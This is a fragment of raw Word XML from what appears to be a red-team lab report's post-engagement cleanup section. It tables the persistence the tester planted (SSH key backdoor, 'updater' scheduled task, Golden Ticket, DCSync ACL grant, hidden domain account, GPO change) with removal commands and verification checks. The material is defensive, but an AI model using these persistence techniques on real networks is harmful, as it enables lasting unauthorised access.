          <w:i w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>03#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>POST-ENGAGEMENT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>CLEANUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="221"/>
        <w:ind w:left="720" w:right="1500" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A professional Red Teamer leaves no persistent backdoors after the engagement concludes.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every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>artifact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the steps taken to return all systems to their original state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="159"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>All</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Mechanisms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Created:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18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6"/>
        <w:gridCol w:w="2341"/>
        <w:gridCol w:w="1711"/>
        <w:gridCol w:w="2966"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="290" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="exact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Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="exact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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="exact"/>
              <w:ind w:left="105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System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="270" w:lineRule="exact"/>
              <w:ind w:left="10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Cleanup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:spacing w:val="-6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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="510" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336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SSH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authorized_key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341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~/.ssh/authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="10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Linux</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225" w:lineRule="exact" w:before="21"/>
              <w:ind w:left="10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(Metasploitable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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Remove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attacker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public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key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entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="489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Scheduled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Task</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225" w:lineRule="exact" w:before="1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"updater"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Windows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Task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Scheduler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="105"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Windows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10"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966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schtasks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/delete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/tn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updater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/f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:bottom="1336" w:left="720" w:right="360"/>
        </w:sect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6"/>
        <w:gridCol w:w="2341"/>
        <w:gridCol w:w="1711"/>
        <w:gridCol w:w="2966"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="510" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="91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Meterpreter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shell (memory)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Process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memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="105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Both</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966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Session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terminated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5"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> no</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225" w:lineRule="exact" w:before="21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disk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="245" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225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Proxychains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SOCKS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proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225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Network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(port</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> 1080)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225" w:lineRule="exact"/>
              <w:ind w:left="105"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Linux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pivot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225" w:lineRule="exact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Kill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SSH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tunnel</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="245" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225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Golden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Ticket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(klist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225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Current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session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memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225" w:lineRule="exact"/>
              <w:ind w:left="105"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="225" w:lineRule="exact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klist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purge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or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system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reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="750" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="239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DCSync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ACL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> grant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="254" w:lineRule="auto"/>
              <w:ind w:right="722"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AD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ACL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on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domain </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="254" w:lineRule="auto"/>
              <w:ind w:left="105" w:right="2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Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966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Remove-</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="atLeast"/>
              <w:ind w:left="109" w:right="227"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DomainObjectAcl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revoke </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="530" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="233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Hidden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Domain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> Account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Active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Directory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OU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="10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Domain</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="21"/>
              <w:ind w:left="10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Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966" w:type="dxa"/>
          </w:tcPr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Remove-ADUser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delete</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="21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backdoor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account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="525" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="239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GPO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341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Group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Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="10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Domain</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="16"/>
              <w:ind w:left="10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Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2966" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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Revert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GPO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original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backup</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="16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state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="239"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="384" w:lineRule="auto"/>
        <w:ind w:right="7007"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Cleanup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Procedures Remove SSH Backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="7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09722" cy="968501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722" cy="9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13"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Added: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914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>138190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5981558" cy="542353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558" cy="542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3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Clean Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w: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914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>189845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5959468" cy="131159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46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384" w:lineRule="auto" w:before="214" w:after="45"/>
        <w:ind w:right="5814"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Cleanup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Procedures </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2D2D2D"/>
        </w:rPr>
        <w:t>Remove Scheduled Task:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:position w:val="-4"/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5048250" cy="142875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pStyle w:val="Heading1"/>
        <w:spacing w:before="223"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Keys:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9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137226</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5891539" cy="517398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539" cy="517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type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="331" w:lineRule="auto" w:before="20"/>
        <w:ind w:right="5584" w:hanging="5"/>
      </w:pPr>
      <w:bookmarkStart w:name="Active Directory Cleanup Procedures" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Cleanup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Procedures Remove DCSync ACL Rights:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6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914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>50341</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5923853" cy="256317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853" cy="25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21"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Accounts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12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914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>139166</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5973664" cy="440340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664" cy="44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2"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Revert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>GPO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Modifications:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6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921543</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>210755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5936456" cy="114300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5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12"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>State</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Verification:</w:t>
      </w:r>
    </w:p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6"/>
        <w:gridCol w:w="3541"/>
        <w:gridCol w:w="3116"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="540" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2696" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3541" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1"/>
              <w:ind w:left="10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Expected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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2696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No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backdoor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SSH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keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3541" w:type="dxa"/>
          </w:tcPr>
          <w:p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cat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~/.ssh/authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="105"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Only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original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legitimate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
